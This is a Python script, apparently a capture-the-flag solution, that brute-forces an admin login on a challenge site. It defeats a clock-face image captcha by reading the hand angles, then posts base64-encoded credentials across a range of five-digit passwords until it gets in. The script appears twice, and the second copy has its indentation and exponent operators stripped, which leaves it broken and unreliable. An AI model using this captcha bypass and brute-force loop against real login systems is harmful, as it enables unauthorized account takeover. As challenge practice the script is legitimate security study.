xl00t/pas-choronophage.py

## pas-choronophage.py
from PIL import Image
import requests
import shutil
import math
from itertools import product
import os
import base64
import re

img_path = './imgs/'


def BlackOrWhite(im):
    newimdata = []
    whitecolor = (255,255,255, 0)
    blackcolor = (0,0,0,255)
    for color in im.getdata():
        if color == (0,0,0):
            newimdata.append(blackcolor)
        else:
            newimdata.append(whitecolor)

    newim = Image.new("RGBA", im.size)
    newim.putdata(newimdata)
    return newim

def points_in_circle(radius):
    for x, y in product(range(int(radius) + 1), repeat=2):
        if x**2 + y**2 >= radius**2 -200 and x**2 + y**2 <= radius**2 +200:
            yield from set(((x, y), (x, -y), (-x, y), (-x, -y),))

def getAngle(a, b, c):
    ang = math.degrees(math.atan2(c[1]-b[1], c[0]-b[0]) - math.atan2(a[1]-b[1], a[0]-b[0]))
    return ang + 360 if ang < 0 else ang

def find_circle(file):
    im = Image.open(file)
    pixs = im.load()
    # img = Image.new("RGBA", im.size, (255, 255, 255, 0))

    minutes_coords = []
    #minutes
    for x, y in list(points_in_circle(70)):
        if(pixs[x+100, y+100]) ==(0, 0, 0, 255):
            minutes_coords.append((x+100, y+100))

    #hours
    hourgood =False
    hours_coords = []
    for x, y in list(points_in_circle(35)):
        if(pixs[x+100, y+100]) == (0, 0, 0, 255) and (x+100, y+100) not in minutes_coords:
            hourgood = True
            hours_coords.append((x+100, y+100))

    if not hourgood:
        good_hour = minutes_coords[int(len(minutes_coords) / 2)]
    else:
        good_hour = hours_coords[int(len(hours_coords)/2)]


    goodmin = minutes_coords[int(len(minutes_coords)/2)]


    minute_angle = getAngle((100,20), (100,100), goodmin)
    hour_angle = getAngle((100,20), (100,100), good_hour)

    real_minutes = str(int(minute_angle / 360 * 60))
    real_minutes = '0'+real_minutes if len(real_minutes) == 1 else real_minutes
    # real_hours

    real_hours = str(int(hour_angle / 360 * 12))
    real_hours = '0'+real_hours if len(real_hours) == 1 else real_hours

    return real_hours+real_minutes

def get_time(file):


    im = Image.open(img_path+file)
    im = BlackOrWhite(im)

    file = "test"+file
    im.save(img_path+file)
    ret = find_circle(img_path+file)
    os.system(f"rm -f {img_path}*")
    return ret


def get_inputs(txt):
    x = re.findall(r"addClickToInput\((.*?)\)", txt)
    inputs = [c.replace(' ','').split(',') for c in x]
    return inputs

def tranform_date(date, txt):
    out = ""
    for i in date:
        for j in txt:
            if j[0] == i:
                out+=j[1]
                break
    return out

def main():
    url = "http://passichronophage.chall.malicecyber.com/"

    for i in range(60000,80000):
        good_captcha = False
        while not good_captcha:
            try:
                sess = requests.Session()
                r = sess.get(f"{url}index.php").text
                inps = get_inputs(r)
                captcha = r.split('<img class="captcha-image" src="')[1].split('"')[0]
                response = requests.get(f"{url}{captcha}", stream=True)

                file = captcha.split('/')[1]
                with open(img_path+file, 'wb') as out_file:
                    shutil.copyfileobj(response.raw, out_file)
                hour = get_time(file)
                print(f"Try password {i:05} with captcha {hour}")
                hour = tranform_date(hour , inps)
                payload = {
                    "username": base64.b64encode("admin".encode()).decode(),
                    "password": base64.b64encode(f"{i:05}".encode()).decode(),
                    "captcha": base64.b64encode(hour.encode()).decode()
                }
                r = sess.post(f"{url}login.php", data=payload)
                if "Too Many Requests" in r.text:
                    pass
                elif "Wrong captcha" not in r.text and "Bad username/password" in r.text:
                    good_captcha = True
                elif "Wrong captcha" not in r.text and "Bad username/password" not in r.text:
                    print(r.text)
                    exit()
            except Exception as e:
                pass


if __name__ == '__main__':
    main()
	from PIL import Image
	import requests
	import shutil
	import math
	from itertools import product
	import os
	import base64
	import re

	img_path = './imgs/'


	def BlackOrWhite(im):
	newimdata = []
	whitecolor = (255,255,255, 0)
	blackcolor = (0,0,0,255)
	for color in im.getdata():
	if color == (0,0,0):
	newimdata.append(blackcolor)
	else:
	newimdata.append(whitecolor)

	newim = Image.new("RGBA", im.size)
	newim.putdata(newimdata)
	return newim

	def points_in_circle(radius):
	for x, y in product(range(int(radius) + 1), repeat=2):
	if x2 + y2 >= radius2 -200 and x2 + y2 <= radius2 +200:
	yield from set(((x, y), (x, -y), (-x, y), (-x, -y),))

	def getAngle(a, b, c):
	ang = math.degrees(math.atan2(c[1]-b[1], c[0]-b[0]) - math.atan2(a[1]-b[1], a[0]-b[0]))
	return ang + 360 if ang < 0 else ang

	def find_circle(file):
	im = Image.open(file)
	pixs = im.load()
	# img = Image.new("RGBA", im.size, (255, 255, 255, 0))

	minutes_coords = []
	#minutes
	for x, y in list(points_in_circle(70)):
	if(pixs[x+100, y+100]) ==(0, 0, 0, 255):
	minutes_coords.append((x+100, y+100))

	#hours
	hourgood =False
	hours_coords = []
	for x, y in list(points_in_circle(35)):
	if(pixs[x+100, y+100]) == (0, 0, 0, 255) and (x+100, y+100) not in minutes_coords:
	hourgood = True
	hours_coords.append((x+100, y+100))

	if not hourgood:
	good_hour = minutes_coords[int(len(minutes_coords) / 2)]
	else:
	good_hour = hours_coords[int(len(hours_coords)/2)]


	goodmin = minutes_coords[int(len(minutes_coords)/2)]


	minute_angle = getAngle((100,20), (100,100), goodmin)
	hour_angle = getAngle((100,20), (100,100), good_hour)

	real_minutes = str(int(minute_angle / 360 * 60))
	real_minutes = '0'+real_minutes if len(real_minutes) == 1 else real_minutes
	# real_hours

	real_hours = str(int(hour_angle / 360 * 12))
	real_hours = '0'+real_hours if len(real_hours) == 1 else real_hours

	return real_hours+real_minutes

	def get_time(file):


	im = Image.open(img_path+file)
	im = BlackOrWhite(im)

	file = "test"+file
	im.save(img_path+file)
	ret = find_circle(img_path+file)
	os.system(f"rm -f {img_path}*")
	return ret


	def get_inputs(txt):
	x = re.findall(r"addClickToInput\((.*?)\)", txt)
	inputs = [c.replace(' ','').split(',') for c in x]
	return inputs

	def tranform_date(date, txt):
	out = ""
	for i in date:
	for j in txt:
	if j[0] == i:
	out+=j[1]
	break
	return out

	def main():
	url = "http://passichronophage.chall.malicecyber.com/"

	for i in range(60000,80000):
	good_captcha = False
	while not good_captcha:
	try:
	sess = requests.Session()
	r = sess.get(f"{url}index.php").text
	inps = get_inputs(r)
	captcha = r.split('<img class="captcha-image" src="')[1].split('"')[0]
	response = requests.get(f"{url}{captcha}", stream=True)

	file = captcha.split('/')[1]
	with open(img_path+file, 'wb') as out_file:
	shutil.copyfileobj(response.raw, out_file)
	hour = get_time(file)
	print(f"Try password {i:05} with captcha {hour}")
	hour = tranform_date(hour , inps)
	payload = {
	"username": base64.b64encode("admin".encode()).decode(),
	"password": base64.b64encode(f"{i:05}".encode()).decode(),
	"captcha": base64.b64encode(hour.encode()).decode()
	}
	r = sess.post(f"{url}login.php", data=payload)
	if "Too Many Requests" in r.text:
	pass
	elif "Wrong captcha" not in r.text and "Bad username/password" in r.text:
	good_captcha = True
	elif "Wrong captcha" not in r.text and "Bad username/password" not in r.text:
	print(r.text)
	exit()
	except Exception as e:
	pass


	if __name__ == '__main__':
	main()